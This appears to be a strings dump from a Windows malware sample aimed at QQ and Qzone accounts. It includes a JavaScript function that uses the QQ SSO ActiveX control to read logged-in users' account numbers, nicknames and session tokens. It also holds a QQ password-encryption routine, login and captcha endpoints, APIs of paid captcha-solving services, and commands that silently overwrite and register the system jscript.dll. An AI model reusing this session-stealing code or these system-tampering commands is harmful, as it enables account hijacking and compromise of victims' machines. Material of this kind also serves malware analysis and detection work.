1.1.3
&sessionid=0&keyword=
&redwords[]=
&sessionid=1&keyword=
hXXp://VVV.jsdati.com
hXXp://VVV.qqchaoren.net
hXXp://VVV.uuwise.com
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
skey=
; skey=
skey=@
function timea(){var d,s;d=new Date();d.setTime('
getEncryption("{pass}","{uin}","{code}")
{pass}
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   "\n";
return t   aC.substring(z, aC.length)
return "0"   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
au.prototype.am = aA;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = "0".charCodeAt(0);
ar = "a".charCodeAt(0);
ar = "A".charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == "-") {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return "-"   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
/*if(navigator.appName=="Netscape"&&navigator.appVersion<"5"&&window.crypto&&window.crypto.random){ var H=window.crypto.random(32); for(K=0; K<H.length; ++K){ W[ae++]=H.charCodeAt(K)&255 } }*/
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length; ++ae) {
return o.next()
for (t = 0; t < z.length; ++t) {
af.prototype.nextBytes = ax;
z = (z + this.S[aD] + aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B++) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A += 2) {
C += String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A++) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C++) {
var A = u.length;
for (var B = 0; B < E.length; B++) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B += 2) {
C[A++] = parseInt(E.substr(B, 2), 16)
for (var B = 0; B < C.length; B++) {
A += String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = "=";
d.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + B + B);
A.push(G.charAt(H >> 18) + G.charAt((H >> 12) & 63) + G.charAt((H >> 6) & 63) + B);
return A.join("")
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i += 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
return core_md5(opad.concat(hash), 512 + 128)
for (var i = 0; i < str.length * chrsz; i += chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i += chrsz) {
str += String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i++) {
str += hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i += 3) {
if (i * 8 + j * 6 > binarray.length * 32) {
str += tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i + 2) {
arr.push("\\x" + str.substr(i, 2))
arr = arr.join("");
if (Math.random() > (probability || 1)) {
var url = location.protocol + "//ui.ptlogin2.qq.com/cgi-bin/report?id=" + mid;
var s = document.createElement("img");
s.src = url;
function getEncryption(password, salt, vcode) {
var md5Pwd = md5(password),
rsaH1 = RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = "000" + vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len + rsaH1 + TEA.strToBytes(salt) + vcodeLen + hexVcode);
TEA.initkey("");
return saltPwd.replace(/[\/\+=]/g,
"/": "-",
"+": "*",
"=": "_"
hXXp://r.qzone.qq.com/cgi-bin/user/qzone_cgi_msg_getcnt2?uin=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=手机QQ空间&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html
login_sig=
,login_sig:"
VVV.qqydw.com
&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.
&js_type=1&login_sig=
hXXp://check.ptlogin2.qq.com/check?regmaster=
&0.7227352769114077
hXXp://captcha.qq.com/cap_union_show?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?aid=
&0.18814749689772725
hXXp://captcha.qq.com/cap_union_verify?aid=
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-12-
hXXp://ptlogin2.qq.com/login?u=
ptmbsuperkey=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptsig=
skey=
p_skey=
'0','','0','
hXXp://find.qq.com/index.html?version=1&im_version=5407&width=910&height=610&search_target=0
&sessionid=0&keyword=&agerg=
\jscript.dll
`.data
FJScript.dll
{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}
Software\Microsoft\Windows Script\Settings
SOFTWARE\Microsoft\Windows Script\Features
JSCRIPT.dll
JScript.Compact Author
{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}
Sœ3
JScript.Compact
JScript.Encode
{lX-X-X-XX-XXXXXX}
iexplore.exe
{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}
{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyExA
VERSION.dll
msvcrt.dll
_amsg_exit
jscript.pdb
pet,wD?m|C8^[nWL4r%VshUG25.dO;-Aaz"`kN=g
.GzVBj/&IA42[vrC89pEhqO
stdole2.tlbWWW
.ObjectWW
.Math
^%sqrt
M&join
zyexec
copy jscript.dll %windir%\system32\
regsvr32 %windir%\system32\jscript.dll /s
&num=15&cgi_host=http://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6&code_version=1&format=jsonp&need_private_comment=1&g_tk=
q.com/cgi-bin/emotion_cgi_msglist_v6?uin=
{"certified":
&count=15&sidomain=ctc.qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&refer=2&r=0.4309617872349918&g_tk=
zone.qq.com/cgi-bin/feeds/feeds_html_act_all?uin=
hXXp://ic2.
hXXp://ctc.qzs.qq.com/qzone/profile/index.html?tab=info
data-unikey=\x22
data-key=\x22
WinHttp.WinHttpRequest.5.1
application/x-www-form-urlencoded
SetClientCertificate
VVV.baidu.com
Primary Key
select count(*) from sqlite_master where type='table' and tbl_name='
select name as title from sqlite_master where type='table'
select name as title from sqlite_master where type='table' and name not like('sqlite%')
select sql from sqlite_master where type='table' and name='
SELECT name FROM sqlite_master WHERE type='table' ORDER BY name
select sql from sqlite_master where type='index' and name='
select sql from sqlite_master where type='view' and name='
select sql from sqlite_master where type='trigger' and name='
%d/%d/%d %d:%d:%d
Adodb.Stream
MSScriptControl.ScriptControl
Scripting.Encoder
1, 2, 0, 1, 2, 0, 2, 0, 0, 2, 0, 2, 1, 0, 2, 0,
1, 0, 2, 0, 1, 1, 2, 0, 0, 2, 1, 0, 2, 0, 0, 2,
1, 1, 0, 2, 0, 2, 0, 1, 0, 1, 1, 2, 0, 1, 0, 2,
1, 0, 2, 0, 1, 1, 2, 0, 0, 1, 1, 2, 0, 1, 0, 2
digits["A".charCodeAt(0)+i] = i
digits["a".charCodeAt(0)+i] = i+26
for (var i=0; i<10; i++) digits["0".charCodeAt(0)+i] = i+52
if (char.charCodeAt(0) > 126) return char
if (escapes.indexOf(char) != -1) return escaped.substr(escapes.indexOf(char), 1)
val += (digits[string.substr(0,1).charCodeAt(0)] << 2)
val += (digits[string.substr(1,1).charCodeAt(0)] >> 4)
val += (digits[string.substr(1,1).charCodeAt(0)] & 0xf) << 12
val += ((digits[string.substr(2,1).charCodeAt(0)] >> 2) << 8)
val += ((digits[string.substr(2,1).charCodeAt(0)] & 0x3) << 22)
val += (digits[string.substr(3,1).charCodeAt(0)] << 16)
scriptIndex = encodingString.indexOf(marker, stringIndex)
unEncodingString += encodingString.substring(stringIndex, scriptIndex)
scriptIndex += marker.length
unEncodingString += encodingString.substr(stringIndex, encodingString.length)
encodingLength = encodingString.substr(scriptIndex, 6)
scriptIndex += (6 + "==".length)
stringIndex = scriptIndex + "DQgAAA==^#~@".length
char = encodingString.substr(scriptIndex, 1)
if (char.charCodeAt(0) < 0xFF)
unEncodingString += String.fromCharCode(transformed[pick_encoding[unEncodingIndex%64]][char.charCodeAt(0)])
unEncodingString += unescape(encodingString.substr(++scriptIndex, 1))
re = new RegExp("(JScript|VBscript).encode", "gmi")
while(arr = re.exec(unEncodingString)) unEncodingString = RegExp.leftContext + RegExp.$1 + RegExp.rightContext
strdec(AdodbStream.ReadText);
function urlencodeutf8(str) {
function urlencode(str) {
function urldecode(str) {
urlencode
0.0.0.0
0000000000
Math.round(new Date().getTime()/1000)
Math.round(new Date().getTime())
Math.round(new Date().getTime() * 100)
7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2
WScript.Shell
rundll32.exe url.dll,FileProtocolHandler
x =a.replace(/^\s+/, '')
1970/01/01 00:00:00
1970-01-01 00:00:00
\Microsoft\Network\Connections\pbk\rasphone.pbk
ChangePasswordRequested
PasswordExpired
TempObj=JSON.parse(str);
var obj=JSON.parse(str);
Lobj.push(obj);
return Lobj.length;
function GetAllKey(){
Lobj = JSON.parse(str);
var str=JSON.stringify(Lobj);
return Lobj.str;
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf())
? this.getUTCFullYear() + '-' +
f(this.getUTCMonth() + 1) + '-' +
f(this.getUTCDate()) + 'T' +
f(this.getUTCHours()) + ':' +
f(this.getUTCMinutes()) + ':' +
f(this.getUTCSeconds()) + 'Z'
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"' + string.replace(escapable, function (a) {
: '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
v = partial.length === 0
? '[\n' + gap + partial.join(',\n' + gap) + '\n' + mind + ']'
: '[' + partial.join(',') + ']';
length = rep.length;
partial.push(quote(k) + (gap ? ': ' : ':') + v);
if (Object.prototype.hasOwnProperty.call(value, k)) {
v = partial.length === 0
? '{\n' + gap + partial.join(',\n' + gap) + '\n' + mind + '}'
: '{' + partial.join(',') + '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000' + a.charCodeAt(0).toString(16)).slice(-4);
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
throw new SyntaxError('JSON.parse');
JSON.stringify(Lobj['
Lobj.push("
Lobj.push(
Lobj.push('
Lobj.length
JSON.stringify(Lobj[
Lobj.splice(
JSON.stringify(Lobj
GetAllKey
function encrypt(str,pass){
data = m_xxtea.encrypt(str, pass);
function decrypt(str,pass){
data = m_xxtea.decrypt(str, pass);
if (str.match(/^[\x00-\x7f]*$/) != null) {
return str.toString();
len = str.length;
c = str.charCodeAt(i);
out[j] = str.charAt(i);
out[j] = String.fromCharCode(0xc0 | (c >>> 6),
out[j] = String.fromCharCode(0xe0 | (c >>> 12),
c2 = str.charCodeAt(i);
out[j] = String.fromCharCode(0xf0 | ((c >>> 18) & 0x3f),
return out.join('');
if ((str.match(/^[\x00-\x7f]*$/) != null) ||
(str.match(/^[\x00-\xff]*$/) == null)) {
c = str.charCodeAt(i++);
out[j++] = str.charAt(i - 1);
c2 = str.charCodeAt(i++);
out[j++] = String.fromCharCode(((c & 0x1f) << 6) |
c3 = str.charCodeAt(i++);
out[j++] = String.fromCharCode(((c & 0x0f) << 12) |
c4 = str.charCodeAt(i++);
out[j++] = String.fromCharCode(((s >>> 10) & 0x03ff) | 0xd800,
var base64EncodeChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.split('');
len = str.length;
c = str.charCodeAt(i++) << 16 |
str.charCodeAt(i++) << 8 |
str.charCodeAt(i++);
c = str.charCodeAt(i++);
c = str.charCodeAt(i++) << 8 |
return out.join('');
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
if (/[^ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\+\/\=]/.test(str)) {
if (str.charAt(len - 2) == '=') {
else if (str.charAt(len - 1) == '=') {
c1 = base64DecodeChars[str.charCodeAt(i++)];
c2 = base64DecodeChars[str.charCodeAt(i++)];
out[j++] = String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
c3 = base64DecodeChars[str.charCodeAt(i++)];
out[j++] = String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));
c4 = base64DecodeChars[str.charCodeAt(i++)];
out[j++] = String.fromCharCode(((c3 & 0x03) << 6) | c4);
var length = data.length;
data[i] = String.fromCharCode(
return data.join('').substring(0, n);
return data.join('');
var length = string.length;
result[i >> 2] = string.charCodeAt(i) |
string.charCodeAt(i + 1) << 8 |
string.charCodeAt(i + 2) << 16 |
string.charCodeAt(i + 3) << 24;
result[result.length] = length;
this.encrypt = function(string, key) {
var k = stringToLongArray(key, false);
if (k.length < 4) {
k.length = 4;
var n = v.length - 1;
var mx, e, p, q = Math.floor(6 + 52 / (n + 1)), sum = 0;
this.decrypt = function(string, key) {
var mx, e, p, q = Math.floor(6 + 52 / (n + 1)), sum = q * delta & 0xffffffff;
* See hXXp://pajhome.org.uk/crypt/md5 for details.
function hex_sha1(s){return binb2hex(core_sha1(str2binb(s),s.length * chrsz));}
function b64_sha1(s){return binb2b64(core_sha1(str2binb(s),s.length * chrsz));}
function str_sha1(s){return binb2str(core_sha1(str2binb(s),s.length * chrsz));}
function hex_hmac_sha1(key, data){ return binb2hex(core_hmac_sha1(key, data));}
function b64_hmac_sha1(key, data){ return binb2b64(core_hmac_sha1(key, data));}
function str_hmac_sha1(key, data){ return binb2str(core_hmac_sha1(key, data));}
for(var i = 0; i < x.length; i += 16)
* Calculate the HMAC-SHA1 of a key and some data
function core_hmac_sha1(key, data)
var bkey = str2binb(key);
if(bkey.length > 16) bkey = core_sha1(bkey, key.length * chrsz);
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
var hash = core_sha1(ipad.concat(str2binb(data)), 512 + data.length * chrsz);
return core_sha1(opad.concat(hash), 512 + 160);
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
for(var i = 0; i < str.length * chrsz; i += chrsz)
bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (32 - chrsz - i%32);
for(var i = 0; i < bin.length * 32; i += chrsz)
str += String.fromCharCode((bin[i>>5] >>> (32 - chrsz - i%32)) & mask);
for(var i = 0; i < binarray.length * 4; i++)
str += hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((3 - i%4)*8 )) & 0xF);
for(var i = 0; i < binarray.length * 4; i += 3)
if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
__MSVCRT_HEAP_SELECT
qqcrypt.dll
(2015.05.14)
(2015.05.12)
(2015.05.11)
(2015.05.02)
(2015.04.28)
(2015.04.21)
(2015.04.15)
(2015.04.02)
(2015.04.01)
(2015.03.30)
(2015.03.27)
(2015.03.26)
(2015.03.25)
(2015.03.23)
(2015.03.18)
(2015.03.14)
(2015.03.13)
(2015.03.07)
(2015.03.06)
(2015.03.05)
(2015.03.01)
(2015.02.09)
(2015.01.31)
(2015.01.30)
(2015.01.29)
(2015.01.28)
(2015.01.22)
(2015.01.19)
(2015.01.18)
(2015.01.13)
(2015.01.12)
(2015.01.11)
(2015.01.10)
(2015.01.08)
(2014.12.24)
(2014.12.23)
(2014.12.21)
(2014.12.01)
(2014.11.30)
(2014.11.25)
(2014.11.22)
(2014.11.20)
(2014.11.14)
(2014.11.13)
(2014.11.12)
(2014.11.11)
tn|px.lD
.comment {color:green}
*.txt
|*.txt
%d&&'
123456789
00003333
1.2.18
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSWHEEL_ROLLMSG
Broken pipe
Inappropriate I/O control operation
Operation not permitted
AVIFIL32.dll
WinExec
GetWindowsDirectoryA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
WINMM.dll
WINSPOOL.DRV
comdlg32.dll
.PAVCNotSupportedException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
icmp.dll
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr>
<tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr>
<tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr>
<table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>
burlywood
\winhlp32.exe
:%d) |
%I64d%s
:0{}%s
:%d)%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
msvfw32.dll
avifil32.dll
winmm.dll
msimg32.dll
winspool.drv
ws2_32.dll
9.5.25.212
1, 0, 6, 6
- Skin.dll
2014, 2, 7, 1
FastVerCode.DLL
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
2.0.0.5
WiseClientAPI-2.0.0.5
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
|2.0.0.5|
